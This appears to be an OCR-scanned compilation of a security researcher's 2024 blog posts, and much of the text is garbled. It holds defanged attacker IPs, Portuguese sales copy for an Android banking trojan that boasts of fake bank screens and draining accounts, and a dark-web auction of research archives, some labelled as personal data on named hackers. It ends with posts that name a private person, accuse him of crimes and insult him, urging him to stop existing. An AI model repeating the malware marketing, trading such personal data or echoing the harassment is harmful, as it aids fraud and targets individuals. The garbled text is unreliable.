51[.]81[.]56[.]136 

89[.]163[.]128[.]25 

81[.]7[.]16[.]177 

81[.]170[.J128[.]221 

109[.]70[.]100[.]71 

158[.]255[.]1[.]112 
j6jvmwagorhg4xpjkcy26d3i4au6pz6nyroqxreefmnl7yxgcruxzkmyd[.]onion 


Sample Photos: 


Sem eles, 
nada disso 
seria 
possivel 


sickoDevz Pereira Flyn 
CEO & Developer Adminisirador Administrador 


[3] 
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a) 


Tela Falsa 


© bot insere uma tela faisa do propio banco para 
© bico ndo ver o bot operands e ndo desconmiar 
do absolutamente nada 


[4] 


Device Logs 


Veja sokios bancarios e todo 
processo do bot utilizando o 
mecanismo de Device Logs 


[5] 


Por Que Escolher A Criminal? 


Resumo rapido é 
somente aqui ! 


ce) Nés da equipe Criminal trabalhamos 


dia e noite para adicionar funcées 
novas semanalmente e 
bancos/mecanismos novos para 
deixar seu trampo ainda melhor 


19) 


ATS 


Transtira todo valor da conta da 
Pessoa om segundos apenas fazendo 
ola abrir o propio bance 
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CriminalIMW Y . 


14 imaginoy tirar to<to dinhelro ce ATT AN 


Land Conia bancaria om saqusd 


IPeNnas instatando um virus F 
Iparoihe cia F 1? conheoa jaa 
CriminaiMw 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEiAUSIRxNbL3Zsd1f YZ10-uM5C4uxZLrGegZ55Ins JRvIMOq 


9nnK9_LPqHLibdMiIHXTjYRDI5s_dKKOqGxNLjQMpPKOh3U1NpMXx2Q 


2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh1Bxlp2efLOUA7_JvpROaaNIyRV7QIB50xsa4YgimKk7_g4z 


G1VeLScL1JMkqwIYmvEzz2nLMT jn6KiatL_H8NEQkj1zirz71Qq- 


3. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEg7Lh3B1zd JQKkbMVvFx1GD59x1uCWVsa67 bdV6SA6Hmf6FD 


4. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEg7axt9T9ODPVYG2UxKz03m j TwuirqvRpCBNeXB93UV20FCT 
5. https: //blogger . googleuser content . com/img/b/R29v22x1/AVvXsEjGX7pyyqzck_o1Bdy71sn6ZcUUE4F2TciXEjMzT JOHVIX15 


2.1.8 Who Can Improve My Wikipedia Article? (2024-01-15 20:12) 


Who can assist and improve my [1]Wikipedia article? 


Thank you. 


[2] 


N 
£ 


8 


6 Darah Dene Demon 


1. https://en.wikipedia.org/wiki/Draft :Dancho_Danche 


2. https: //blogger. googleusercontent . com/img/a/AVvXsEi02Z-aeWX4D3t YDEatdFSOwP4oT JB9wNVOM-OnyOmKHJ79Pr9IDXybdA 
DOM-4FsclMmPaepoeFbJ_MsitPsx1Ua15zVJ9wKcLodgQ1xIAtQBi 


2.1.9 Retiring (2024-01-16 18:37) 


[1] 
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popes - 
2 ~-MEMORABILIA 


= | by. Dantho Danchey-; aoe ses 
‘nttps: HHadanchev, blogspot.com =~ 
-Eniait t:dancho, danchev@hush. com. = 


—— 


2S. 


I’m retiring. Ebay memorabilia auction soon with some surprises. I'll post a link here. All of my 
research 2005-2023 here - [2]https://archive.org/details/@ddanchev Yours sincerely. Dancho 


[3] 
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(3 


‘e te Wee fewte: foe re 


2@e@ &. 


Gmail Cree 


Gr 


» « Danche Danchey 


Search att o mete 0 


* bete a herd 


Search De wee 


na hes © yrote Coeets ames Wped cera Gesmeteo 


Vare omeee? 


[4] 


Die eet aciise 
Catastne 


Reheat 


Smo © 
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Dancho Danchev 
From Wikipedia, the free encyclopedia 


Ree EE eee ne ees Se Dancho Danchev 
Contents Citizenship Bulgarian 
1 Career Occupation Security researcher 
2 Koobface investigations Website 
3 2010 Disappearance Dancho Danchov's bog 
4 References 
5 External links 
Career tes! 


Danchev is known for discovering computer virus and spamming attacks a5 they surface on the Internet, and 
providing details on the new threats.!?! As a security researcher, he has been the first person to report major 
malware campaigns as they begin to take form.!2! Danchev has also discussed the use of new technology, like 
USB keys. and their potential effects on the internal security of the computer systems of major corporations, !?! 
Face CN a wane OF ON ONY Ok SONOS breaking through Internet security protocols as 
weit |* 


His blog posts and articles have included explanations of the overall landscape of the underground malware 
industry in countries like Russia and China,!>!!! in addition to the use of the internet by terrorist networks,!7"8! 
The entities he has reported on include volunteer militias of hackers that independently attack the servers of 
enemy nations while their countries are in the midst of military operations, such as Russia's involvement in 
Georgia,!*) in 2009 he discovered that the indian embassy in Spain had been taxen over to serve matware to 
those who visited the site.!!°! He also reports on the hacking of major corporate websites.!?!!!2113) 

Specific attacks that Danchev provided initial analysis for include a “Chinese hacktivist” attack on CNN.com in 
2008;!24!!15) the Operation Ababil attack on Wells Fargo. U.S. Bank and PNC Bank;!!®! 4 2009 malicious comment 
attack on YouTube and Digg.com;!!?! a large 2010 blackhat SEO campaign affecting both Bing and Google 
searches; "8! 3 2009 New York Times malvertisement attack:!?9) and a 2010 attack on Network Solutions,!?0! 


Koobface investigations {ea} 


In February 2010 Danchev posted an article called “10 things you didn’t know about the Koobface gang”, 
discussing various interactions he has had with them (they once redirected the Focebook website to his blog) and 
other pleces of information, in May the creators of the malware then forced its network to post o point by point 
response to the article on the screens of ail the computers they had infected.!?2! Danchev continued his 
investigations into the gang, eventually posting the full biographical details of some of its members on his 
blog.!??! 


2010 Disappearance (ess) 


In late 2010 ZONer, which Danchev co-wrote, reported that he had disappeared from home in Bulgaria and was 
feared harmed.!?3! On September 11, 2010 he submitted what would be his final post of the year, writing about 
a “cyber jihad™ and during that month he also sent letters to friends stating that he was concerned that he was 
under surveitiance.!**! After his disappearance ZDNet received a messaqe statina that "Dancho's alive but he's 


[5] 


Dancho, HBGary is interested in talking w/ you about Threat 
Intelligence 


From:greg@hbgary.com 

To: dancho. danchev@gmail.com 

Date: 2009-04-15 13:02 

Subject: Dancho, HBGary is interested in talking w/ you about Threat Intelligence 


Dancho, 


My company, HSGary, is developing a new business unit which we call “Global 
Services”. A keystone of the offering is tracking human and organizational 
factors behind malware threats. Your work, and some of the work of your 
peers, seems to be very good analysis in this area. Since the space is new 
to us, I want to tap the best minds in the industry to help us develop an 
offering. Would you be interesting in spending some time with our team to 
discuss your work and methodology? On the market side I am also trying to 
pin down what customers will actually pay for, and perhaps you have some 
insight here as well. I am willing to hire you as a consultant, and/or pay 
for your time and travel in any way that works for you. I will be at RSA 
next week, and our company has an event for customers in San Jose in the 


first or second week of May. I also travel to Washington DC quite alot. 


[6] 
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1 
2, httpe://archive.org/detaile/Sddanchev 

3 
4 


aAFhpT3hGFI Eee eee jiltrkgkfH 
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2.1.10 Auction Onion (2024-01-18 14:25) 


Dancho Danchev's Dark Web Onion 1.5TB OSINT/Cybercrime Research and Threat 
Intelligence Gathering Personal Memorabilia Files 2010-2023 Private Torrent Dark Web 
Auction 


https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com 
Wire Bank Transfer Details for This Dark Web Auction Available On Request Using Email 


Auction Bids For My Private Personal Files 2010-2023 Memorabilia Torrent [1.5TB] 
[ZIP] Start At $85,000 


Full Directory Listing in HTML Available As A Teaser Using Email 


Dear Dark Web Onion visitor, 


his is Dancho Danchev (https //ddanchev Dlogspot com) and fm proud to welcome you to my Dark Web Onion 
wetion Web site. 


eywords: Dark Web, Dark Web Onion, Hacking, Hacker, Hackers, Dancho Danchevy, Intelligence, intelligence 
Studies, intelligence Community, NSA, GCHO, Cyber intelligence, Malicious Software, Malware, Cyber 
Surveillance, Eavescropping, Wiretapping, Top Secret, Classified, Top Secret Program, Classified Program, 
ybercrime, Data Mining, Big Data, Cybercrime Research, Threat Intelligence, Security Industry, Information 
Security, information Security industry. Computer Security, Computer Hacking, Network Security, Network 
lacking, OSINT, Russia, Iran, Russian Hackers, iranian Hackers, Russian Cybercriminal, Cybercrime Forum, 
ybercrime Forum Community, Astalavista, Astalavista. box sk Box. sk, Box sk Network, Cracks, Serials 
Keygens, Key Generators, Hacker Search Engine, Cracks Search Engine, Serials Search Engine, Threat 
Melligence, Cybercrime Research, Malware, Malicious Software, Botnet, Botnets, Reverse Engineering, Kali 
inux, Metasplo#, CVE, Bluetooth, RFID, Wireless, Tools, Bruteforce, Social Engineering, XSS, SQL Injection 
Secure Coding, Exploit, Vulnerability, Bug Bounty, Exploit Kit, Zero Day, Patch Tuesday, Fuzzing, Framework 
Remote Code Execution, SOCMINT, Dark Web, Deep Web, Metadata, EXIF, OPSEC, Maltego, Palantir, SIEM 
indicator of Compromise, Advanced Persistent Threat, TTP, Malware Tracker, Malware Blockist. Threat 
Intelligence Feed, Threat Intelligence API, MISP. STIX, Command and Control, Malware Feed, OpenCT| 
Malware Sandbox, Javascript Obfuscation, Reverse Engineering, Honeypot, MD5, Malware Sample, Passive DNS, Domainkeys, IP Reputation, Blacklist, Spam 
Filtering, Spam Solution, Spam Feed, Bayesian Filter, Heuristic Filter. Temporary Email, Blackhat SEO, Phishing Framework, Phishing Template, SPF, Spear 
Phishing, Phishing Report, Security Training, Typosquatting, Domain Reputation, Phishing Kit, P2P Botnet, Botnet Shutdown, Botnet Sinkole, IRC Botnet, ASN 
Monitoring, Linux Malware, Botnet Mitigation, Spam Botnet, DDoS Botnet, Botnet Tracker, VPN, SSL Encryption, Full Disk Encryption, End-to-Enc Encryption 
Cookie Tracking, Do Not Track. Tor Network, NSA. GCHQ, Browser Finterprint PGP, OTR. OMEMO, SSL, ONSSEC, IPSec, Encrypted Email, Encryption Tool, Zero 
Knowledge Backup, Ethernet Encryption, APT, Money Mule. Re-Shipping Fraud, Credit Card Fraud, Hacker Group, Web Site Defacement Mobile Botnet, loT 
Botnet, Router Botnet, 2FA Cryptohippie, Exit Node, OpenVPN, Wireguard, VPN Jurisdiction, VPN No Logs, VPN Router, Free VPN, VPN Trial, VPN Technology 


[2]Dark Web Onion. 


1. https://blogger .googleusercontent .com/img/a/AVVXsEi0QwGUTiBcAfWdgc_Fxidmq9xkLbvTIPoLCwQr9EeWN6SslktwheNnc 
6EKEO45 j JZpmC IW] C2ADMAiA8vGOCQs1C8laNf9Bg4xP8H5dsFooah 
2. http: //cnaomocftxw3wh7gyyct5kpf3rctteornc7uup7ak4oiyy35ypvd31id. onion/ 


2.1.11 Research Compilation 2005-2023 - Torrent (2024-01-20 00:47) 


[1] 
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Cybercrime_Forum_Data_Set_2021.rar 
Dancho_Danchev_Astalavista_Security_Newsle... 
Dancho_Danchev_Blog_Archive_ JSON_2021.rar 
Dancho_Danchev_Blog_E-Book_Archive_2021.... 
Dancho_Danchev_Cyber_Threat_Actors_Analy... 


Dancho_Danchev_Cybercrime_Research_2021 ... 


Dancho_Danchev_Cybercrime_Research_Prese... 
Dancho_Danchev_Intelligence_Community_2.... 
Dancho_Danchev_Interview_DW_Koobface_Bo... 


Dancho_Danchev_Iran_Hackers_Personally_Ide... 


Dancho_Danchev_Iran_White_Paper_2021.rar 
Dancho_Danchev_Iran_White_Paper_Part_Two... 
Dancho_Danchev_Keynote_Koobface_Botnet.... 


Dancho_Danchev_Malware_Trends_White_Pap... 
Dancho_Danchev_Medium_Research_Compila... 
Dancho_Danchev_Personal_Memoir_Compilat... 
Dancho_Danchev_Private_Party_New_Year_Vid... 
Dancho_Danchev_Security_Policy_White_Pape... 


Dancho_Danchev_TwitterAccount_Archive_2... 
Dancho_Danchev_Unit-123_Security_Research... 
Dancho_Danchev_Webroot_Research_Compil... 
Dancho_Danchev_ZDNet_Research_Compilati... 
WhoisXML_API Research_Articles_2021.rar 


UPDATE: 


[2 ]New link. 
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[3] 


39.4 GB 
288 MB 
4.15 MB 
6.06 GB 
9.24 MB 
754 kB 
10.9 MB 
1008 MB 
2.65 MB 
3.04 GB 
255 MB 
9.99 MB 
163 MB 
2.41 MB 
60.7 MB 
164 MB 
541 MB 
2.41 MB 


: 
* 


27.4 MB 
602 MB 
464 MB 
48.6 MB 


Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 
Seeding 


Seeding 


Seeding 


|| Cybercrime_Forum_Data_Set_2021 61,120,172,747 


| Dancho_Danchev_Blog_E-Book_Archive_2021 6,512,017,221 
QO Dancho_Danchev_lran_Hackers_Personally_Identifiable_Information_Compilation_2021 3,271,685, 164 
| Dancho_Danchev_Cybercrime_Personal_Photos_Ecosystem_2021_Compilation 1,655,693, 139 
a Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 911,383,016 
a Dancho_Danchev_ZDNet_Research_Compilation_2021 692,896,821 
O Dancho_Danchev_Webroot_Research_Compilation_2021 692,896,821 
BY Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 659,396,866 
im Dancho_Danchev_lran_White_Paper_Part_Two_2021 348,769,928 
ia Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 348,769,928 
4 Dancho_Danchev_lran_White_Paper_2021 268,079,837 
| Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 186,005,904 
ny Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 176,572,076 
fa Dancho_Danchev_Medium_Research_Compilation_2021 69,817,301 
|_| WhoisXML_API_Research_Articles_2021 56,543,476 
QO Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 31,856,017 
0 Dancho_Danchev_Cybercrime_Research_Presentations_2021 12,329,249 
| Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 10,129,788 
ie Dancho_Danchev_Security_Policy_White_Paper_2021 5,057,044 
mY Dancho_Danchev_Malware_Trends_White_Paper_2021 5,057,044 
ie Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 2,838, 160 
| Dancho_Danchev_Cybercrime_Research_2021_Personally_ldentifiable_Information_Compilation 2,409,268 
ie Dancho_Danchev_Twitter_Account_Archive_2021 884,810 


1. https: //blogger. googleusercontent.com/img/b/R29VZ2x1/AVvXsEhbty yHD-wb5Vv4xbULUHGTaQwWYd-vBDs57ygQLC4NjDRf 


1c8xMTIZEjxfUnxX0Um1fbCyucApV9J9HIisBU7v jhBw-Md9Q5IQaz 
2. https://drive.google.com/file/d/1bmwTz0tVb2Vxqp5Wc7xSy_UFnmxmJW4Y/view?usp=shar ing 
3 


2.1.12 Cybercrime Forum Data Set - 2024 - Torrent (2024-01-20 11:09) 


[1] 

8 Archive_01 10/21/2022 4:20 PM WinRAR archive 95,241 KB 
8 Archive_02 10/21/2022 5:38 PM WinRAR archive 392,519 KB 
8 Archive_03 10/21/2022 4:38 PM WinRAR archive 159,028 KB 
HEE Archive_04 10/21/2022 3:54 PM WinRAR archive 12,161 KB 
8 Archive_05 10/21/2022 5:55 PM WinRAR archive 338,750 KB 
HB Archive_06 10/22/2022 7:43 AM WinRAR archive 129,025 KB 
8 Archive_07 10/21/2022 5:04 PM WinRAR archive 562,089 KB 
$8 Archive_08 10/21/2022 2:42 PM WinRAR archive 691,458 KB 
| Archive_09 10/21/2022 5:03 PM WinRAR archive 248,050 KB 
8 Archive_10 3/7/2022 7:13 AM WinRAR ZIP archive 721,586 KB 
8 Archive_11 6/23/2022 6:22 AM WinRAR ZIP archive 271,104 KB 
8 Archive 12 6/23/2022 6:22 AM WinRAR ZIP archive 268,032 KB 

UPDATE: 

[2]New link. 
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$B Cybercrime_Forum_Data_Set_2024_01 
Eo | Misc_01 

Ee | Misc_01 

Ew | Misc_03 

Ew | Misc_04 

9 Archive_01 


8 Misc_01 

EB Archive_10 
EE Archive_08 
88 Archive_07 
| Archive_02 
9 Archive_05 
8 Archive_11 
wo | Archive_12 
8 Archive_09 
8 Archive_03 
HEE Archive_06 
E Archive_01 
EE Archive_04 


BB Cybercrime Forum_Data_Set_Archive_2022 
BB Cybercrime Forum_Data_Set_2021 

BB cybercrime Forum_Data_Set_Archive_2019 
© Misc_o1 

BB Cybercrime Forum_Data_Set_Archive_2021 
Eo | Cybercrime_Forums_Compilation_2021_08 
Ee | Cybercrime_Forums_Compilation_2021_08_01 
Ea | Cybercrime_Forums_Compilation_2021_10 
Eo | Cybercrime_Forums_Compilation_2021_09 

Fw | Cybercrime_Forums_Compilation_2021_09_01 
Ea | Cybercrime_Forums_Compilation_2021_08_02 
| Cybercrime_Forums_Compilation_2021_05 


[3] 


1/19/2024 2:54 AM WinRAR archive 
12/22/2023 3:48 PM WinRAR ZIP archive 
10/21/2022 5:04 PM WinRAR archive 
9/7/2023 12:51 PM WinRAR ZIP archive 
9/7/2023 1:06 PM WinRAR ZIP archive 
10/21/2022 4:20 PM WinRAR archive 
[4] 
10/22/2022 7:50 AM WinRAR archive 
3/7/2022 7:13 AM WinRAR ZIP archive 
10/21/2022 2:42 PM WinRAR archive 
10/21/2022 5:04 PM WinRAR archive 
10/21/2022 5:38 PM WinRAR archive 
10/21/2022 5:55 PM WinRAR archive 
6/23/2022 6:22 AM WinRAR ZIP archive 
6/23/2022 6:22 AM WinRAR ZIP archive 
10/21/2022 5:03 PM WinRAR archive 
10/21/2022 4:38 PM WinRAR archive 
10/22/2022 7:43 AM WinRAR archive 
10/21/2022 4:20 PM WinRAR archive 
10/21/2022 3:54 PM WinRAR archive 
[5] 
10/17/2022 5:34 AM WinRAR archive 
6/22/2022 6:27 AM WinRAR archive 
10/16/2019 5:06 PM WinRAR ZIP archive 
9/7/2023 8:41 AM WinRAR ZIP archive 
5/18/2021 2:47 PM WinRAR archive 
12/25/2021 9:18 AM WinRAR archive 
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2.2.1 A Case Study on a Bulgarian Dipshit Local Drug Addict Gang Member and A 
Peasant From Troyan, Bulgaria Part of The Gang that Robbed and Kidnapped 
and Home Molested Me (2024-02-11 10:48) 
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When you're so dumb that even the "drugs" can’t "catch you". The next thing that follows is 
the laughing. 
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2.2.2 Petar Shoshkov - Exposing a Bulgarian Troyan City Based Bottom Sucking Gang 
Member That Robbed Home Molested and Kidnapped Me (2024-02-11 10:48) 
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Is it the "lack" of or the lack of? 
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2.2.3 The Ugliest Bulgarian Wannabe Law Enforcement Officer Real Life "Cop" In the 
Bulgarian "System" (2024-02-11 10:48) 
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Can you suck my bottom? Do you have the permission of other people to do it before you suck 
mine? Do you know what does this constitutes? Let’s play a game. If my bottom is in the 
ugliest and most disgusting part of the universe and you want to suck it does this mean that 
you're there too? You don’t exist. 


We in the face of your parents should rather pay you to best yourself and stop existing and 
make a free low profile non-existent and cheap movie out of it which is something that you 
shouldn’t forget doesn’t constitute anything. It’s the very art of having you beat yourself 
courtesy of your parent’s money and having the very same non-existent Bulgarian dipshits 
pay you to beat yourself. While beating yourself you can easily forget about compilations 
and series of movies about your beating simply because your very ugliness and disgusting 
existence doesn’t compare to that of a human being. 
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